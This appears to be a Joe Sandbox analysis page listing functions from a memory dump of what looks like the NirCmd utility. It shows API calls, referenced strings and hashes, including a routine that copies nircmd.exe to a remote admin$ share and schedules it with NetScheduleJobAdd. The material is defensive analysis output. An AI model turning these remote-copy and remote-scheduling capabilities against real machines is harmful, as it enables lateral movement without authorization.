Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$ByteCharMultiWide$ErrorLastLibrary$AddressFreeLoadProc
String ID: CreateProcessWithLogonW$advapi32.dll
API String ID: 969872975-2238408776
Opcode ID: c8e85411d734271b515c21c643e7b85feab6c8f72f4788a19d13a785dfd467ee
Instruction ID: 9b7d86e6ffba30b3c5eb017853c87504cc71b726d5a995e6fbb3f6575b1d0632
Opcode Fuzzy Hash: c8e85411d734271b515c21c643e7b85feab6c8f72f4788a19d13a785dfd467ee
Instruction Fuzzy Hash: F841A1B180112CBACB219F85CC449DFBBBCEF49350F1046A6F619A2250D3B54BD0CFA9

Function 00404BD1 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 95COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 00404BD7
_strcmpi.MSVCRT ref: 00404BEC

Strings

waveout, xrefs: 00404BE6
aux, xrefs: 00404C59
master, xrefs: 00404BD1
microphone, xrefs: 00404C2B
phone, xrefs: 00404C42
synth, xrefs: 00404BFD
wavein, xrefs: 00404C9C
headphones, xrefs: 00404C87
line, xrefs: 00404C70

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi
String ID: aux$headphones$line$master$microphone$phone$synth$wavein$waveout
API String ID: 1439213657-1911086473
Opcode ID: c9b3d0e6ef2a7369ebca0c6a69ee07f272b32f128b7fdf2b743ef42b5b2d1902
Instruction ID: 7df1aee929c7ba9d71f8332c97ec416d7870386ef3be4270d71cab4c33990498
Opcode Fuzzy Hash: c9b3d0e6ef2a7369ebca0c6a69ee07f272b32f128b7fdf2b743ef42b5b2d1902
Instruction Fuzzy Hash: 08110DB234E61429F929A1562E13BCB42898FD176BFB0406BFA00E41C6FFDD99D1915C

Function 0040804C Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 168fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408093
memset.MSVCRT ref: 004080AC
memset.MSVCRT ref: 004080C5
sprintf.MSVCRT ref: 004080D9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,000010FE), ref: 004080FC
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,000000FF,?,?,000010FE), ref: 00408110
memset.MSVCRT ref: 004081AA
memset.MSVCRT ref: 004081C2
_mbscpy.MSVCRT ref: 004081DD
_mbscat.MSVCRT ref: 004081F5
CopyFileA.KERNEL32(?,?,00000000), ref: 00408208

Strings

nircmd.exe %s, xrefs: 004080D3
admin$\nircmd.exe, xrefs: 004081EF
NetScheduleJobAdd, xrefs: 00408217
NetApiBufferFree, xrefs: 0040824E
NetRemoteTOD, xrefs: 0040811B

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$ByteCharMultiWide$CopyFile_mbscat_mbscpysprintf
String ID: NetApiBufferFree$NetRemoteTOD$NetScheduleJobAdd$admin$\nircmd.exe$nircmd.exe %s
API String ID: 505568804-2025064379
Opcode ID: 43a6bd01bb938118b0041c331df085d8b9c6e458efa7d1ada0e49307fe9760bf
Instruction ID: 6640c16d173142ed877ab8e24523ce1320164c62880729fad12619cfa39506a5
Opcode Fuzzy Hash: 43a6bd01bb938118b0041c331df085d8b9c6e458efa7d1ada0e49307fe9760bf
Instruction Fuzzy Hash: 67516E72900218AEDB24EB65CD81DDA77ACAF19344F1044BFF109E7191DA78DB888F68

Function 0040E65F Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,0040E6E4,?,00405B0C,?,00000000,?), ref: 0040E666
LoadLibraryA.KERNEL32(rasapi32.dll,0040E6E4,?,00405B0C,?,00000000,?), ref: 0040E674
GetProcAddress.KERNEL32(00000000,RasSetEntryDialParamsA), ref: 0040E68D
GetProcAddress.KERNEL32(?,RasEnumConnectionsA), ref: 0040E699
GetProcAddress.KERNEL32(?,RasGetConnectStatusA), ref: 0040E6A5
GetProcAddress.KERNEL32(?,RasHangUpA), ref: 0040E6B1
GetProcAddress.KERNEL32(?,RasGetEntryDialParamsA), ref: 0040E6BD
GetProcAddress.KERNEL32(?,RasDialA), ref: 0040E6C9

Strings

RasDialA, xrefs: 0040E6BF
RasEnumConnectionsA, xrefs: 0040E68F
RasSetEntryDialParamsA, xrefs: 0040E687
RasGetEntryDialParamsA, xrefs: 0040E6B3
RasHangUpA, xrefs: 0040E6A7
RasGetConnectStatusA, xrefs: 0040E69B
rasapi32.dll, xrefs: 0040E66F

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: RasDialA$RasEnumConnectionsA$RasGetConnectStatusA$RasGetEntryDialParamsA$RasHangUpA$RasSetEntryDialParamsA$rasapi32.dll
API String ID: 2449869053-1206557285
Opcode ID: 71aaf8e264078e9ae537e9612b3cbd77450f4deb84e043f1f82426b8833c9efd
Instruction ID: 65e3c979efa681916e7576962b566444c402bdb742678064d88459515a261b7c
Opcode Fuzzy Hash: 71aaf8e264078e9ae537e9612b3cbd77450f4deb84e043f1f82426b8833c9efd
Instruction Fuzzy Hash: 2F019670A40741ABCB316FB69C09E46BEF5EF987017218C2EE2C1D36A0D7799190CE58

Function 00406D05 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 142windowstringthreadCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00406D11
memset.MSVCRT ref: 00406D3F
GetClassNameA.USER32(?,?,000000FF), ref: 00406D52
strcmp.MSVCRT ref: 00406D64

Part of subcall function 00405A62: _strcmpi.MSVCRT ref: 00405A6E

Part of subcall function 004028F0: _strcmpi.MSVCRT ref: 004028F6

memset.MSVCRT ref: 00406D97
GetWindowTextA.USER32(?,?,000003FF), ref: 00406DAA
memset.MSVCRT ref: 00406DF5
GetWindowThreadProcessId.USER32(?,?), ref: 00406E04
GetDlgItem.USER32(?,00000000), ref: 00406E60
GetDlgItem.USER32(?,00000000), ref: 00406E97
SendMessageA.USER32(00000000,0000000C,00000000,?), ref: 00406EAB

Strings

settext, xrefs: 00406E75
#32770, xrefs: 00406D5E
click, xrefs: 00406E39

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Windowmemset$Item_strcmpi$ClassMessageNameProcessSendTextThreadVisiblestrcmp
String ID: #32770$click$settext
API String ID: 3158724904-3905513361
Opcode ID: 9785ac1e430260d5d4f15da67f87f2c35c9e09eb3164c4ab4b482526dbfb543d
Instruction ID: c98b9a54c935c2ae70c476c698d3e9d96ef63d6e7f5c2b5905e05dc1cf8f4857
Opcode Fuzzy Hash: 9785ac1e430260d5d4f15da67f87f2c35c9e09eb3164c4ab4b482526dbfb543d
Instruction Fuzzy Hash: A041E8B29001157FDB10AB24DC81ADBBB6CEF10304F154176FA59F62A2DB789E948FD8

Function 0040F15A Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 63COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 0040F1EE

Strings

Cookies, xrefs: 0040F1CC
Startup, xrefs: 0040F18F
Common Desktop, xrefs: 0040F1DA
Start Menu, xrefs: 0040F181
Desktop, xrefs: 0040F17A
Favorites, xrefs: 0040F196
Common AppData, xrefs: 0040F1C5
AppData, xrefs: 0040F1D3
Common Startup, xrefs: 0040F1E1
Programs, xrefs: 0040F19D
Common Programs, xrefs: 0040F1E8
Common Start Menu, xrefs: 0040F1A4
Recent, xrefs: 0040F188

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscpy
String ID: AppData$Common AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Cookies$Desktop$Favorites$Programs$Recent$Start Menu$Startup
API String ID: 714388716-3872221218
Opcode ID: 39e8b9259193fd68494e0f8eaaa6bd526b02396006d03aefd8de4e6d3ca13815
Instruction ID: 04336655cea802fbc0651c6151d7ed60d8497528a5b63523210cc5d93020a277
Opcode Fuzzy Hash: 39e8b9259193fd68494e0f8eaaa6bd526b02396006d03aefd8de4e6d3ca13815
Instruction Fuzzy Hash: 0701AC722A8656F2D4340168FA06EB628419185BD57B806B77402BCDDCDDBC8ECF605F

Function 00407F04 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 101windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402174: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004018B7,?), ref: 00402186

GetFileSize.KERNEL32(00000000,00000000), ref: 00407F2E
??2@YAPAXI@Z.MSVCRT ref: 00407F46
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407F59
GetLastError.KERNEL32 ref: 00407F82
sprintf.MSVCRT ref: 00407FAA
MessageBoxA.USER32(?,?,Error,00000030), ref: 00407FD1
??3@YAXPAX@Z.MSVCRT ref: 00407FDA

Part of subcall function 004022C8: memcpy.MSVCRT ref: 00402317

CloseHandle.KERNEL32(?), ref: 00407FE3
GetLastError.KERNEL32 ref: 00407FF1
sprintf.MSVCRT ref: 00408019
MessageBoxA.USER32(?,?,Error,00000030), ref: 0040803F

Strings

Error %d: %s, xrefs: 00407FA4, 00408013
Error, xrefs: 00407FC2, 00408032

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: File$ErrorLastMessagesprintf$??2@??3@CloseCreateHandleReadSizememcpy
String ID: Error$Error %d: %s
API String ID: 1131545048-1552265934
Opcode ID: a2704f4704187353d4ee1d566cdf999123559d004b48586a0c9d3502838ebb84
Instruction ID: 8206235b0e51beb1d0c25bb8055d523058538b48c07205db64ed49fc0719cbc8
Opcode Fuzzy Hash: a2704f4704187353d4ee1d566cdf999123559d004b48586a0c9d3502838ebb84
Instruction Fuzzy Hash: 423197B6804214ABDB109F64DC49EDA7BBCEB04350F1081B7FB04E6191DB789A84CB69

Function 0040DB11 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0040DC56,0040659A), ref: 0040DB24
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040DB3D
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040DB4E
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040DB5F
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040DB70
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040DB81
FreeLibrary.KERNEL32(00000000,?,0040DC56,0040659A), ref: 0040DBA1

Strings

CreateToolhelp32Snapshot, xrefs: 0040DB37
Process32First, xrefs: 0040DB6A
Module32First, xrefs: 0040DB48
Process32Next, xrefs: 0040DB7B
kernel32.dll, xrefs: 0040DB1F
Module32Next, xrefs: 0040DB59

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 2449869053-3953557276
Opcode ID: 2dfeca48bb519ecfaf3585a1d8d739bc96133058e89086ca2f85793663d3707c
Instruction ID: a9d4a894401f68dc3eb1d0b3637c4ef96432469f831c8ba14263845b0d00b76f
Opcode Fuzzy Hash: 2dfeca48bb519ecfaf3585a1d8d739bc96133058e89086ca2f85793663d3707c
Instruction Fuzzy Hash: 03014830E45345AAD7119F65AD40FEB7FB85745B41B134137E804F1299DB7CD445CA2C

Function 0040DBA9 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,0040DC4F,0040659A), ref: 0040DBBC
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040DBD5
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040DBE6
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040DBF7
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040DC08
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040DC19
FreeLibrary.KERNEL32(00000000,?,0040DC4F,0040659A), ref: 0040DC39

Strings

GetModuleBaseNameA, xrefs: 0040DBCF
GetModuleFileNameExA, xrefs: 0040DBF1
EnumProcessModules, xrefs: 0040DBE0
GetModuleInformation, xrefs: 0040DC13
psapi.dll, xrefs: 0040DBB7
EnumProcesses, xrefs: 0040DC02

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: 8d394d909052c0c6dc06b76a2046d9b5e037efd72e31190055624da345fc0950
Instruction ID: 5fbac02b998787e6f1c694c415afe70afff8354c933033301084b361f9600769
Opcode Fuzzy Hash: 8d394d909052c0c6dc06b76a2046d9b5e037efd72e31190055624da345fc0950
Instruction Fuzzy Hash: 23014434E49209AAE7115F656F40BF73DBC9B49B41B11803BE804F2299DBBCC486CA2C

Function 004063DF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 0040D92C: GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
Part of subcall function 0040D92C: LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
Part of subcall function 0040D92C: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
Part of subcall function 0040D92C: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
Part of subcall function 0040D92C: GetLastError.KERNEL32(?,00000000,?), ref: 0040D976

Part of subcall function 0040E395: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E3B5
Part of subcall function 0040E395: memset.MSVCRT ref: 0040E3CA
Part of subcall function 0040E395: Process32First.KERNEL32(?,?), ref: 0040E3E6
Part of subcall function 0040E395: Process32Next.KERNEL32(?,00000128), ref: 0040E537
Part of subcall function 0040E395: CloseHandle.KERNEL32(?,?,00000128,?,00000000), ref: 0040E547

memset.MSVCRT ref: 00406481
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000003FF), ref: 0040649C
OpenProcess.KERNEL32(02000000,00000000), ref: 004064AC
CloseHandle.KERNEL32(?,?,00000002,?,00000000,?), ref: 004064E6
GetLastError.KERNEL32(00000000,?), ref: 004064E8
CloseHandle.KERNEL32(00000000), ref: 004064F7
memset.MSVCRT ref: 00406505
GetLastError.KERNEL32(?,?,?,?), ref: 00406539
CloseHandle.KERNEL32(?), ref: 0040654A
FreeLibrary.KERNEL32(?), ref: 00406554
FreeLibrary.KERNEL32(?,?), ref: 00406562

Strings

SeDebugPrivilege, xrefs: 004063ED

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: CloseHandleLibrary$ErrorFreeLastmemset$ProcessProcess32$AddressByteCharCreateCurrentFirstLoadMultiNextOpenProcSnapshotToolhelp32Wide
String ID: SeDebugPrivilege
API String ID: 3149602138-2896544425
Opcode ID: 70be08f02be23f15489362f91db534fbf102b2f81c88aafaba976d8bd2f6eebe
Instruction ID: 11b70bda48b1d8c568e68257f6bfe3ea0126de163d0e533b3a456ffbac74b7bf
Opcode Fuzzy Hash: 70be08f02be23f15489362f91db534fbf102b2f81c88aafaba976d8bd2f6eebe
Instruction Fuzzy Hash: 04516971801268AFDB20EF65DC849DE3BA8FF08B44F11412BFE15E22A1D7789955CF98

Function 004028F0 Relevance: 21.1, APIs: 8, Strings: 6, Instructions: 81COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 004028F6
_strcmpi.MSVCRT ref: 0040290B

Strings

cancel, xrefs: 0040292D
yes, xrefs: 004028F0
retry, xrefs: 00402942
ignore, xrefs: 00402957
close, xrefs: 0040296C
help, xrefs: 00402981

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi
String ID: cancel$close$help$ignore$retry$yes
API String ID: 1439213657-4066124357
Opcode ID: ee2e5cfa8ef28a114d4274b2f8462284868e833512c48c2d8bb767c99bb01b93
Instruction ID: 9533f4aa031e0338bf16b211eecd7ea11a36002ea6de446394b0a8781d1b28e7
Opcode Fuzzy Hash: ee2e5cfa8ef28a114d4274b2f8462284868e833512c48c2d8bb767c99bb01b93
Instruction Fuzzy Hash: E1013CF23AE71528F91925656F17BCA42888B10B3BF30106BF924E40C2FFDC59C1104C

Function 0040E57F Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,00000000,0040E55F,00000104,0040E46B,?,00000000,?,?,?,?,00000000), ref: 0040E58A
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E59E
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040E5AA
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 0040E5B6
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 0040E5C2
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 0040E5CE

Strings

GetModuleBaseNameA, xrefs: 0040E596
GetModuleFileNameExA, xrefs: 0040E5AC
EnumProcessModules, xrefs: 0040E5A0
GetModuleInformation, xrefs: 0040E5C4
psapi.dll, xrefs: 0040E585
EnumProcesses, xrefs: 0040E5B8

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2238633743-232097475
Opcode ID: d86b9189533c92767b48b8f457185df58f04a271026efabb8b0961f9f6d7d4b6
Instruction ID: 1f806c2beddc41445365b716785778413a1ba09f5a0006f55f70f71c0a300a82
Opcode Fuzzy Hash: d86b9189533c92767b48b8f457185df58f04a271026efabb8b0961f9f6d7d4b6
Instruction Fuzzy Hash: 85F0D474E44344AACB306FB69C09E46BEF1EF987017218C2FE1C5A3660D7799281CF48

Function 00406585 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 149COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004065B7
memset.MSVCRT ref: 004065CF

Part of subcall function 00405984: _strcmpi.MSVCRT ref: 00405997

memcpy.MSVCRT ref: 0040666D
memset.MSVCRT ref: 00406694
_mbscpy.MSVCRT ref: 004066A7
memcpy.MSVCRT ref: 0040672A

Strings

Cannot find the specified process !, xrefs: 00406773
bin, xrefs: 00406604
noascii, xrefs: 004065F2
Failed to load the process library !, xrefs: 0040677A
nohex, xrefs: 004065D7

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$memcpy$_mbscpy_strcmpi
String ID: Cannot find the specified process !$Failed to load the process library !$bin$noascii$nohex
API String ID: 3151238675-4186054902
Opcode ID: b830ef37f156b8544966f0cf6b1d1a9e6bff85abafff0fec9d094babc2d4475c
Instruction ID: 3bab61cf86fbcf8dacd901e450bc04c43f6c0fb12eb641aeba2398d55cb04ec1
Opcode Fuzzy Hash: b830ef37f156b8544966f0cf6b1d1a9e6bff85abafff0fec9d094babc2d4475c
Instruction Fuzzy Hash: A451D5B1D00218ABDB10AF55CD82ADE7778AB04308F1504BFE509B6282D7B8CBA4CF59

Function 00409F2D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00409EBF
sprintf.MSVCRT ref: 00409EE7
MessageBoxA.USER32(?,?,Error,00000030), ref: 00409F0E

Part of subcall function 0040E6E6: memset.MSVCRT ref: 0040E71E
Part of subcall function 0040E6E6: memcpy.MSVCRT ref: 0040E729
Part of subcall function 0040E6E6: strlen.MSVCRT ref: 0040E736
Part of subcall function 0040E6E6: strcmp.MSVCRT ref: 0040E74D
Part of subcall function 0040E6E6: GetCurrentProcess.KERNEL32 ref: 0040E75A
Part of subcall function 0040E6E6: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040E76F
Part of subcall function 0040E6E6: GetProcAddress.KERNEL32(00000000), ref: 0040E776
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7BC
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7D4
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7EC
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E804
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E81C

Strings

Error %d: %s, xrefs: 00409EE1, 00409FCC
The specified key is not valid !, xrefs: 00409F48
Cannot delete the key, because it contains one or more subkeys., xrefs: 00409F85
Error, xrefs: 00409EFF, 00409FEA

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$AddressCurrentErrorHandleLastMessageModuleProcProcessmemcpymemsetsprintfstrcmpstrlen
String ID: Cannot delete the key, because it contains one or more subkeys.$Error$Error %d: %s$The specified key is not valid !
API String ID: 312217311-3851681830
Opcode ID: 76fde70ad3bed5aa2d9a9ba37b3fca5a39bd747f8f1cb7f2d6cf2db1f36cd31d
Instruction ID: 784e17db3339b62a1aa1aa82f5d838bb963f59f64cfb1df870e710820f8d6ac9
Opcode Fuzzy Hash: 76fde70ad3bed5aa2d9a9ba37b3fca5a39bd747f8f1cb7f2d6cf2db1f36cd31d
Instruction Fuzzy Hash: 4041F272904289ABEB20AF25DC499DA77A8EB04745F20007BF915F21E3DB7C8D90CF58

Function 00405F1F Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

